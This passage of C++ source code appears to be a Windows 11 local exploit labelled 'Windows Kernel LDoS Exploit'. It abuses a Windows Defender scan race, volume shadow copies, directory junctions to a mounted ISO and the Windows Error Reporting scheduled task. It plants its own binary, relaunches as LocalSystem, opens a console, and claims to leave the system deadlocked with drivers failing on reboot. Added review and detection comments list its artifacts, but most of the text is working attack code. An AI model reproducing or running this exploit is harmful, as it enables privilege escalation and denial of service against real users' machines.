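// is checked (the previous version leaked it and dereferenced it unchecked).
bool IsRunningAsLocalSystem() {
    HANDLE htoken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &htoken)) {
        printf("[!] OpenProcessToken failed, error: %d\n", GetLastError());
        return false;
    }
    // TOKEN_USER plus room for the largest possible SID.
    const DWORD bufsz = MAX_SID_SIZE + sizeof(TOKEN_USER);
    TOKEN_USER* tokenuser = (TOKEN_USER*)malloc(bufsz);
    if (!tokenuser) {
        CloseHandle(htoken);
        return false;
    }
    DWORD retsz = 0;
    const bool queried = GetTokenInformation(htoken, TokenUser, tokenuser, bufsz, &retsz) != FALSE;
    CloseHandle(htoken);
    // Only inspect the SID if the query filled the buffer.
    const bool islocalsystem = queried && IsWellKnownSid(tokenuser->User.Sid, WinLocalSystemSid);
    free(tokenuser);
    return islocalsystem;
}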
// Only reached from main() when the process runs as LocalSystem: duplicates the
// current primary token, stamps it with `sessionid`, and starts
// C:\Windows\System32\conhost.exe under that token in the target session.
// Returns nothing; every failure is silent (early return), and the result of
// CreateProcessAsUser is not checked either.
// Defender note: a SYSTEM process enabling SeTcb/SeAssignPrimaryToken/
// SeImpersonate/SeDebug and then calling CreateProcessAsUser with a token whose
// session id was rewritten is a high-signal token-manipulation pattern in
// process-creation / privilege-use telemetry; the child here is conhost.exe with
// this binary as parent.
void LaunchConsoleInSessionId(DWORD sessionid) {
HANDLE htoken = NULL;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &htoken))
return;
// Return values of SetPrivilege are ignored; a missing privilege surfaces only
// as a later API failure.
SetPrivilege(htoken, SE_TCB_NAME, TRUE);
SetPrivilege(htoken, SE_ASSIGNPRIMARYTOKEN_NAME, TRUE);
SetPrivilege(htoken, SE_IMPERSONATE_NAME, TRUE);
SetPrivilege(htoken, SE_DEBUG_NAME, TRUE);
HANDLE hnewtoken = NULL;
bool res = DuplicateTokenEx(htoken, TOKEN_ALL_ACCESS, NULL, SecurityDelegation, TokenPrimary, &hnewtoken);
CloseHandle(htoken);
if (!res)
return;
// Changing TokenSessionId on a primary token requires SeTcbPrivilege.
res = SetTokenInformation(hnewtoken, TokenSessionId, &sessionid, sizeof(DWORD));
if (!res) {
CloseHandle(hnewtoken);
return;
}
STARTUPINFO si = { 0 };
si.cb = sizeof(si);
PROCESS_INFORMATION pi = { 0 };
CreateProcessAsUser(hnewtoken, L"C:\\Windows\\System32\\conhost.exe", NULL,
NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
CloseHandle(hnewtoken);
// pi is zero-initialised, so the handles are only closed if creation succeeded.
if (pi.hProcess)
CloseHandle(pi.hProcess);
if (pi.hThread)
CloseHandle(pi.hThread);
return;
}
// Load-generator thread: after g_poseidonevent is signalled, refills the shared
// g_poseidonbuf with random bytes in a tight loop until g_poseidonexit is set.
// The thread argument is unused. Always returns ERROR_SUCCESS.
// NOTE(review): g_poseidonexit is a plain bool written by main() and read here
// with no synchronisation, and g_poseidonbuf is written while PoseidonThread
// instances read it — both are data races; the loop also never yields.
DWORD WINAPI PoseidonGeneratorThread(void*) {
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_BELOW_NORMAL);
WaitForSingleObject(g_poseidonevent, INFINITE);
do {
// Return status of BCryptGenRandom is ignored.
BCryptGenRandom(NULL, (PUCHAR)g_poseidonbuf, sizeof(g_poseidonbuf), BCRYPT_USE_SYSTEM_PREFERRED_RNG);
} while (!g_poseidonexit);
return ERROR_SUCCESS;
}
// Disk-churn thread (main() starts one per logical processor): creates a
// delete-on-close file "%TEMP%\RP_<GUID>", waits for g_poseidonevent, then
// rewrites the file from g_poseidonbuf at offset 0 in a tight loop until
// g_poseidonexit is set. Returns GetLastError() if the file cannot be created,
// otherwise ERROR_SUCCESS. The thread argument is unused.
// NOTE(review): the try/catch(int) cannot catch anything here — WriteFile does
// not throw C++ exceptions — so it is effectively dead code.
// NOTE(review): g_poseidonexit / g_poseidonbuf are shared without synchronisation.
// Defender note: the observable footprint is N threads (N = processor count)
// each rewriting a 0x1000-byte file under %TEMP%\RP_ continuously.
DWORD WINAPI PoseidonThread(void*) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
wchar_t target[MAX_PATH] = { 0 };
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
// Share mode 0 and FILE_FLAG_DELETE_ON_CLOSE: exclusive, removed when closed.
HANDLE hfile = CreateFile(target, GENERIC_ALL, NULL, NULL, CREATE_NEW,
FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE, NULL);
if (!hfile || hfile == INVALID_HANDLE_VALUE)
return GetLastError();
WaitForSingleObject(g_poseidonevent, INFINITE);
try {
do {
SetFilePointer(hfile, 0, NULL, FILE_BEGIN);
DWORD ret = 0;
WriteFile(hfile, g_poseidonbuf, sizeof(g_poseidonbuf), &ret, NULL);
} while (!g_poseidonexit);
} catch (int e) {
}
CloseHandle(hfile);
return ERROR_SUCCESS;
}
// Entry point. The same binary is run twice by design: first by the user (the
// long path below), and later as LocalSystem via the Windows Error Reporting
// scheduled task, in which case the IsRunningAsLocalSystem() branch connects to
// the named pipe created by the first instance, launches a console in the
// creator's session and returns early.
// Observable artifacts a defender can key on (all taken from the code below):
// the named pipe "\\.\pipe\RoguePlanet"; a "%TEMP%\RP_<GUID>" working directory
// containing "wdtest_temp" and a subdirectory named after the WER version
// directory; an ISO attached through the virtdisk API without a drive letter;
// mount-point reparse points set on those directories; a copy of this executable
// written into the work tree; and a manual Run() of the task
// "\Microsoft\Windows\Windows Error Reporting\QueueReporting".
// NOTE(review): almost every error path returns without cleanup (directories,
// junctions, the attached ISO and the pipe are left behind), and the stage
// numbering skips from 9 to 11.
int main() {
printf("============================================================\n");
printf(" inouva - Windows Kernel LDoS Exploit\n");
printf(" Windows 11 25H2 (Build 26200) and later\n");
printf("============================================================\n\n");
// Resolve the undocumented Nt* entry points into the file-scope function pointers.
ntdllhm = GetModuleHandle(L"ntdll.dll");
if (!ntdllhm) {
printf("[!] Failed to get ntdll.dll handle.\n");
return 1;
}
_NtSetInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtSetInformationFile");
_NtDeleteFile = (NTSTATUS(WINAPI*)(POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtDeleteFile");
_NtOpenDirectoryObject = (NTSTATUS(WINAPI*)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES))
GetProcAddress(ntdllhm, "NtOpenDirectoryObject");
_NtQueryDirectoryObject = (NTSTATUS(WINAPI*)(HANDLE, PVOID, ULONG, BOOLEAN, BOOLEAN, PULONG, PULONG))
GetProcAddress(ntdllhm, "NtQueryDirectoryObject");
_NtQueryInformationFile = (NTSTATUS(WINAPI*)(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG, FILE_INFORMATION_CLASS))
GetProcAddress(ntdllhm, "NtQueryInformationFile");
if (!_NtSetInformationFile || !_NtDeleteFile || !_NtOpenDirectoryObject ||
!_NtQueryDirectoryObject || !_NtQueryInformationFile) {
printf("[!] Failed to import NT API functions.\n");
return 1;
}
// Auto-reset event that releases the Poseidon load threads in stage 4.
g_poseidonevent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!g_poseidonevent) {
printf("[!] Failed to create event.\n");
return 1;
}
// Second-run path: when re-launched as LocalSystem, find the session of the
// first instance through the pipe it owns and start a console there.
if (IsRunningAsLocalSystem()) {
printf("[*] Running as Local System.\n");
HANDLE hclient = CreateFile(L"\\\\.\\pipe\\RoguePlanet", GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, NULL, NULL);
if (!hclient || hclient == INVALID_HANDLE_VALUE)
return 1;
DWORD sesid = 0;
bool sh = GetNamedPipeServerSessionId(hclient, &sesid);
CloseHandle(hclient);
if (sh) {
LaunchConsoleInSessionId(sesid);
}
return 0;
}
// First-run path from here on.
// Load threads: one generator plus one writer per logical processor, only on
// machines with more than three processors. Thread handles are never closed or
// joined. NOTE(review): `i` is int while dwNumberOfProcessors is DWORD.
SYSTEM_INFO sysinfo = { 0 };
GetSystemInfo(&sysinfo);
if (sysinfo.dwNumberOfProcessors > 3) {
DWORD tid = 0;
CreateThread(NULL, 0, PoseidonGeneratorThread, NULL, 0, &tid);
for (int i = 0; i < sysinfo.dwNumberOfProcessors; i++) {
DWORD tid0 = 0;
CreateThread(NULL, 0, PoseidonThread, NULL, 0, &tid0);
}
printf("[*] Started %d Poseidon threads.\n", sysinfo.dwNumberOfProcessors);
}
// Server end of the rendezvous pipe used by the LocalSystem re-launch above.
HANDLE hpipe = CreateNamedPipe(L"\\\\.\\pipe\\RoguePlanet", PIPE_ACCESS_DUPLEX,
PIPE_WAIT, PIPE_UNLIMITED_INSTANCES,
NULL, NULL, NULL, NULL);
if (!hpipe || hpipe == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create communication pipe, error: %d\n", GetLastError());
return 1;
}
printf("[*] Stage 1: Mounting ISO...\n");
HANDLE hvirtdisk = NULL;
if (!MountISO(&hvirtdisk)) {
printf("[!] Failed to mount ISO.\n");
return 1;
}
printf("[+] ISO mounted successfully.\n");
// Directory handle on %SystemRoot%, used later with ReadDirectoryChangesW.
wchar_t windir2[MAX_PATH] = { 0 };
GetWindowsDirectory(windir2, MAX_PATH);
HANDLE hwin = CreateFile(windir2, GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (!hwin || hwin == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open %ws, error: %d\n", windir2, GetLastError());
return 1;
}
printf("[*] Stage 2: Creating working directory structure...\n");
// workdir = %TEMP%\RP_<GUID> (Win32 form); NT-form variants are derived below.
wchar_t workdir[MAX_PATH] = { 0 };
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;
ExpandEnvironmentStrings(L"%TEMP%\\RP_", workdir, MAX_PATH);
wcscat(workdir, wuid2);
if (!CreateDirectory(workdir, NULL)) {
printf("[!] Failed to create work directory, error: %d\n", GetLastError());
return 1;
}
// Raised priorities for the race in stages 5-7.
SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
// workdir\wdtest_temp, created with NtCreateFile so the handle carries DELETE
// (needed by MoveToTempDir later).
HANDLE hdirtmp = NULL;
wchar_t dirtmp[MAX_PATH] = { 0 };
wsprintf(dirtmp, L"\\??\\%s\\wdtest_temp", workdir);
UNICODE_STRING _dirtmp = { 0 };
RtlInitUnicodeString(&_dirtmp, dirtmp);
OBJECT_ATTRIBUTES dirtmpobjattr = { 0 };
InitializeObjectAttributes(&dirtmpobjattr, &_dirtmp, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK iostat = { 0 };
NTSTATUS dirstat = NtCreateFile(&hdirtmp, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
&dirtmpobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", dirtmp, dirstat);
return 1;
}
// GetWERDir (defined earlier in the file) yields the WER version directory; only
// its leaf name is reused, as the name of the second work subdirectory.
wchar_t wddirname[MAX_PATH] = { 0 };
if (!GetWERDir(wddirname)) {
return 1;
}
wchar_t* verdirname = PathFindFileName(wddirname);
// File-scope zippath = workdir\<verdir>\wermgr.exe (Win32 form).
wsprintf(zippath, L"%s\\%s\\wermgr.exe", workdir, verdirname);
HANDLE hdir = NULL;
wchar_t maindirname[MAX_PATH] = { 0 };
wsprintf(maindirname, L"\\??\\%s\\%s", workdir, verdirname);
UNICODE_STRING _maindirname = { 0 };
RtlInitUnicodeString(&_maindirname, maindirname);
OBJECT_ATTRIBUTES maindirobjattr = { 0 };
InitializeObjectAttributes(&maindirobjattr, &_maindirname, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
// FILE_WRITE_DATA on a directory is what lets CreateJunction() set the reparse point.
dirstat = NtCreateFile(&hdir, GENERIC_READ | FILE_WRITE_DATA | DELETE,
&maindirobjattr, &iostat, NULL, NULL, FILE_SHARE_READ,
FILE_CREATE, FILE_DIRECTORY_FILE, NULL, NULL);
if (dirstat) {
printf("[!] Failed to create working directory: %ws, error: 0x%0.8X\n", maindirname, dirstat);
return 1;
}
printf("[*] Stage 3: Writing EICAR test file...\n");
// Device path of the attached ISO, e.g. "\Device\<leaf of physical path>".
wchar_t _mntpath[MAX_PATH] = { 0 };
ULONG pathsz = MAX_PATH;
DWORD retval = GetVirtualDiskPhysicalPath(hvirtdisk, &pathsz, _mntpath);
if (retval) {
printf("[!] Failed to fetch mounted disk path, error: %d\n", retval);
return 1;
}
wchar_t mntpath[MAX_PATH] = { L"\\Device\\" };
wcscat(mntpath, PathFindFileName(_mntpath));
// WriteEicar is defined earlier in the file; it returns the open file handle or NULL.
HANDLE heicar = WriteEicar(maindirname, mntpath);
if (!heicar)
return 1;
printf("[+] EICAR file written successfully.\n");
printf("[*] Stage 4: Triggering Windows Defender scan...\n");
// Releases the Poseidon threads, then runs the scan trigger (WDStartScan,
// defined earlier) on its own thread; it is joined in stage 9.
SetEvent(g_poseidonevent);
DWORD tid = 0;
HANDLE hthread = CreateThread(NULL, 0, WDStartScan, NULL, 0, &tid);
if (!hthread) {
printf("[!] Failed to create working thread, error: %d\n", GetLastError());
return 1;
}
printf("[+] Windows Defender scan started.\n");
printf("[*] Stage 5: Triggering race condition...\n");
// NT path of the test file inside the work tree, for the DELETE open below.
wchar_t _delpath[MAX_PATH] = { 0 };
wsprintf(_delpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING delpath = { 0 };
RtlInitUnicodeString(&delpath, _delpath);
OBJECT_ATTRIBUTES delobjattr = { 0 };
InitializeObjectAttributes(&delobjattr, &delpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
IO_STATUS_BLOCK deliostat = { 0 };
HANDLE hc = NULL;
// ShadowCopyFinderThread (defined earlier) fills vsspath with a shadow-copy
// device path; the file is then addressed through that snapshot.
wchar_t vsspath[MAX_PATH] = { 0 };
ShadowCopyFinderThread(vsspath);
printf("[*] VSS path: %ws\n", vsspath);
CloseHandle(heicar);
HANDLE hvss = NULL;
wchar_t vsswinpath[MAX_PATH] = { 0 };
// &workdir[3] strips the "C:\" drive prefix so the path can be appended to the
// shadow-copy device path; ":WDFOO" is the alternate data stream WriteEicar created.
wsprintf(vsswinpath, L"%s\\%s\\%s\\wermgr.exe:WDFOO", vsspath, &workdir[3], verdirname);
UNICODE_STRING _vsswinpath = { 0 };
RtlInitUnicodeString(&_vsswinpath, vsswinpath);
OBJECT_ATTRIBUTES objattr2 = { 0 };
InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
// NOTE(review): `stat` is not checked here; if the open failed, hvss is NULL and
// the oplock request below is issued on an invalid handle.
NTSTATUS stat = NtCreateFile(&hvss, GENERIC_READ | SYNCHRONIZE, &objattr2, &iostat,
NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);
// Request a read+handle caching oplock on the snapshot stream and wait for it to
// break before continuing (the wait returns when the oplock is broken by other
// activity on the file).
REQUEST_OPLOCK_INPUT_BUFFER opin = { 0 };
opin.StructureLength = sizeof(opin);
opin.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
opin.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
opin.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
REQUEST_OPLOCK_OUTPUT_BUFFER opout = { 0 };
opout.StructureLength = sizeof(opout);
opout.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
DWORD cb = 0;
OVERLAPPED ovoplock = { 0 };
ovoplock.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
DeviceIoControl(hvss, FSCTL_REQUEST_OPLOCK, &opin, sizeof(opin),
&opout, sizeof(opout), &cb, &ovoplock);
WaitForSingleObject(ovoplock.hEvent, INFINITE);
CloseHandle(hvss);
// Open the live file for DELETE (FILE_SUPERSEDE), move it out of the way, and
// replace the now-empty directory with a junction to the ISO device.
// NOTE(review): delstat is not checked; MoveToTempDir(hc) may be called with NULL.
NTSTATUS delstat = NtCreateFile(&hc, DELETE, &delobjattr, &deliostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_SUPERSEDE, NULL, NULL, NULL);
MoveToTempDir(hc);
if (!CreateJunction(hdir, mntpath))
return 1;
if (hc)
CloseHandle(hc);
printf("[*] Stage 6: Monitoring for directory changes...\n");
// Blocks on synchronous ReadDirectoryChangesW over %SystemRoot% until a rename
// event arrives whose name is 24 wide chars long and begins with "Temp\TMP"
// (case-insensitive, first 8 chars). Only the first record in the buffer is
// examined; the loop has no timeout.
char buff[0x1000] = { 0 };
wchar_t teststr[] = { L"Temp\\TMP" };
do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hwin, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_FILE_NAME, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
if (pfni->FileNameLength / 2 != 24 || _wcsnicmp(&pfni->FileName[0], teststr, 8) != 0)
continue;
break;
} while (1);
printf("[*] Stage 7: Finalizing exploit...\n");
// workdir2 = "\??\" + workdir; used in stage 9 to open the parent directory.
wchar_t workdir2[MAX_PATH] = { L"\\??\\" };
wcscat(workdir2, workdir);
// Re-point the junction at wdtest_temp (CreateJunction overwrites the reparse data).
if (!CreateJunction(hdir, dirtmp)) {
return 1;
}
// Open and byte-range-lock "<ISO device>\wermgr.exe" and the live test file.
wchar_t lockpath[MAX_PATH] = { 0 };
wsprintf(lockpath, L"%s\\wermgr.exe", mntpath);
HANDLE hlock1 = NULL;
UNICODE_STRING _lockpath = { 0 };
RtlInitUnicodeString(&_lockpath, lockpath);
OBJECT_ATTRIBUTES lockpathobjattr = { 0 };
InitializeObjectAttributes(&lockpathobjattr, &_lockpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
// Second EICAR write; the returned handle is closed immediately (NULL on failure
// is passed straight to CloseHandle, which is harmless but unchecked).
CloseHandle(WriteEicar(maindirname, mntpath));
stat = NtCreateFile(&hlock1, GENERIC_READ, &lockpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", lockpath, stat);
return 1;
}
// Lock the whole file (offset 0, length MAXDWORD:MAXDWORD).
if (!LockFile(hlock1, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock file, error: %d\n", GetLastError());
return 1;
}
HANDLE heicar2 = NULL;
wchar_t eicarpath[MAX_PATH] = { 0 };
wsprintf(eicarpath, L"%s\\wermgr.exe", maindirname);
UNICODE_STRING _eicarpath = { 0 };
RtlInitUnicodeString(&_eicarpath, eicarpath);
OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&heicar2, GENERIC_READ, &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", eicarpath, stat);
return 1;
}
// newfpath = maindirname + "\" + <name of the first size-change event seen under
// wdtest_temp>. The do/while executes exactly once (unconditional break).
// NOTE(review): wcscat with no bound check; FileName is not NUL-terminated in
// FILE_NOTIFY_INFORMATION, so this relies on the zeroed buffer past the record.
wchar_t newfpath[MAX_PATH] = { 0 };
wcscpy(newfpath, maindirname);
wcscat(newfpath, L"\\");
do {
ZeroMemory(buff, sizeof(buff));
DWORD retbytes = 0;
ReadDirectoryChangesW(hdirtmp, buff, sizeof(buff), TRUE,
FILE_NOTIFY_CHANGE_SIZE, &retbytes, NULL, NULL);
PFILE_NOTIFY_INFORMATION pfni = (PFILE_NOTIFY_INFORMATION)buff;
wcscat(newfpath, &pfni->FileName[0]);
break;
} while (1);
if (!LockFile(heicar2, NULL, NULL, MAXDWORD, MAXDWORD)) {
printf("[!] Failed to lock EICAR file, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hwin);
// Remove the mount-point reparse data from hdir so it is a plain directory again.
// NOTE(review): the overlapped result is never awaited or checked; only the event
// handle is closed.
REPARSE_GUID_DATA_BUFFER rp_buffer = { 0 };
rp_buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
DWORD cb2 = 0;
OVERLAPPED ov = { 0 };
HANDLE hevent = CreateEvent(NULL, FALSE, FALSE, NULL);
ov.hEvent = hevent;
DeviceIoControl(hdir, FSCTL_DELETE_REPARSE_POINT, &rp_buffer, REPARSE_GUID_DATA_BUFFER_HEADER_SIZE,
nullptr, 0, &cb2, &ov);
CloseHandle(ov.hEvent);
printf("[*] Stage 8: Writing payload...\n");
// Overwrite the file found in the previous step with a copy of this executable.
HANDLE htempfile = NULL;
UNICODE_STRING _newfpath = { 0 };
RtlInitUnicodeString(&_newfpath, newfpath);
OBJECT_ATTRIBUTES newfpathobjattr = { 0 };
InitializeObjectAttributes(&newfpathobjattr, &_newfpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&htempfile, GENERIC_READ | GENERIC_WRITE | DELETE, &newfpathobjattr, &iostat,
NULL, FILE_ATTRIBUTE_NORMAL, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
FILE_OVERWRITE_IF, NULL, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", newfpath, stat);
return 1;
}
HMODULE module = GetModuleHandle(NULL);
wchar_t mx[MAX_PATH] = { 0 };
GetModuleFileName(module, mx, MAX_PATH);
HANDLE hself = CreateFile(mx, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hself || hself == INVALID_HANDLE_VALUE) {
printf("[!] Failed to open current executable, error: %d\n", GetLastError());
return 1;
}
DWORD readbytes = 0;
LARGE_INTEGER li = { 0 };
GetFileSizeEx(hself, &li);
// NOTE(review): malloc result unchecked; li.QuadPart is narrowed to DWORD for ReadFile.
void* exebuff = malloc(li.QuadPart);
if (!ReadFile(hself, exebuff, li.QuadPart, &readbytes, NULL)) {
printf("[!] Failed to read current executable binary, error: %d\n", GetLastError());
return 1;
}
CloseHandle(hself);
readbytes = 0;
OVERLAPPED ovp = { 0 };
ovp.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
// NOTE(review): WriteFile returns a BOOL (0/1), so comparing it with
// ERROR_IO_PENDING (997) is never true — a failed write is not detected here.
if (WriteFile(htempfile, exebuff, li.QuadPart, &readbytes, &ovp) == ERROR_IO_PENDING) {
printf("[!] Failed to write payload file, error: %d\n", GetLastError());
return 1;
}
WaitForSingleObject(ovp.hEvent, INFINITE);
CloseHandle(ovp.hEvent);
free(exebuff);
printf("[*] Stage 9: Finalizing and detaching...\n");
// Move the payload file and both work directories to fresh %TEMP%\RP_<GUID>
// names (return values ignored), then junction the emptied parent work directory
// to %SystemRoot%.
CloseHandle(heicar2);
MoveToTempDir(htempfile);
MoveToTempDir(hdirtmp);
MoveToTempDir(hdir);
HANDLE hparent = NULL;
UNICODE_STRING _workdir = { 0 };
RtlInitUnicodeString(&_workdir, workdir2);
OBJECT_ATTRIBUTES workdirobjattr = { 0 };
InitializeObjectAttributes(&workdirobjattr, &_workdir, OBJ_CASE_INSENSITIVE, NULL, NULL);
iostat = { 0 };
stat = NtCreateFile(&hparent, FILE_WRITE_ATTRIBUTES, &workdirobjattr, &iostat, NULL, NULL,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN,
FILE_DIRECTORY_FILE, NULL, NULL);
if (stat) {
printf("[!] Failed to open file: %ws, error: 0x%0.8X\n", workdir2, stat);
return 1;
}
wchar_t __tmp[MAX_PATH] = { 0 };
GetWindowsDirectory(__tmp, MAX_PATH);
wchar_t dest[MAX_PATH] = { L"\\??\\" };
wcscat(dest, __tmp);
if (!CreateJunction(hparent, dest)) {
return 1;
}
CloseHandle(hparent);
CloseHandle(hdirtmp);
CloseHandle(hdir);
// Tear down the ISO, wait for the scan thread, stop the load threads
// (g_poseidonexit is a plain bool — unsynchronised — and Sleep(500) is the only
// grace period before the thread handles, never held here, are abandoned).
DetachVirtualDisk(hvirtdisk, DETACH_VIRTUAL_DISK_FLAG_NONE, NULL);
CloseHandle(hvirtdisk);
WaitForSingleObject(hthread, INFINITE);
CloseHandle(hthread);
CloseHandle(htempfile);
g_poseidonexit = true;
Sleep(500);
printf("[*] Stage 11: Triggering persistence...\n");
// Task Scheduler COM: manually Run() the built-in WER QueueReporting task.
// Defender note: an on-demand Run() of this task by a non-system process is
// visible in the Task Scheduler operational log and is the hand-off point to the
// LocalSystem re-launch handled at the top of main().
HRESULT hr = S_OK;
ITaskService* pTaskSvc = NULL;
hr = CoInitialize(NULL);
if (SUCCEEDED(hr)) {
hr = CoCreateInstance(CLSID_TaskScheduler, NULL, CLSCTX_INPROC_SERVER,
IID_ITaskService, (void**)&pTaskSvc);
if (FAILED(hr)) {
printf("[!] Failed to initialize task scheduler COM server.\n");
CoUninitialize();
return 1;
}
} else {
return 1;
}
// NOTE(review): `if (hr)` treats any non-zero HRESULT, including S_FALSE-style
// success codes, as failure; FAILED(hr) is the conventional test.
hr = pTaskSvc->Connect(_variant_t(), _variant_t(), _variant_t(), _variant_t());
if (hr) {
printf("[!] Failed to connect to task scheduler service, error: 0x%0.8X\n", hr);
return 1;
}
ITaskFolder* taskfolder = NULL;
hr = pTaskSvc->GetFolder((BSTR)L"\\Microsoft\\Windows\\Windows Error Reporting", &taskfolder);
if (hr) {
printf("[!] Failed to get task scheduler folder, error: 0x%0.8X\n", hr);
return 1;
}
IRegisteredTask* taskex = NULL;
hr = taskfolder->GetTask((BSTR)L"QueueReporting", &taskex);
if (hr) {
printf("[!] Failed to obtain task object, error: 0x%0.8X\n", hr);
return 1;
}
IRunningTask* runningtask = NULL;
hr = taskex->Run(_variant_t(), &runningtask);
if (hr) {
printf("[!] Failed to run scheduled task, error: 0x%0.8X\n", hr);
return 1;
}
// Block until the LocalSystem instance connects to the pipe (see the
// IsRunningAsLocalSystem branch above); no timeout.
if (!ConnectNamedPipe(hpipe, NULL)) {
printf("[!] ConnectNamedPipe failed, error: %d\n", GetLastError());
return 1;
}
printf("\n============================================================\n");
printf(" [!!] EXPLOIT SUCCESSFUL\n");
printf(" System should now be in a frozen/deadlocked state.\n");
printf(" Some drivers may fail to load on next boot.\n");
printf("============================================================\n\n");
runningtask->Release();
taskex->Release();
taskfolder->Release();
pTaskSvc->Release();
CoUninitialize();
return 0;
}
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================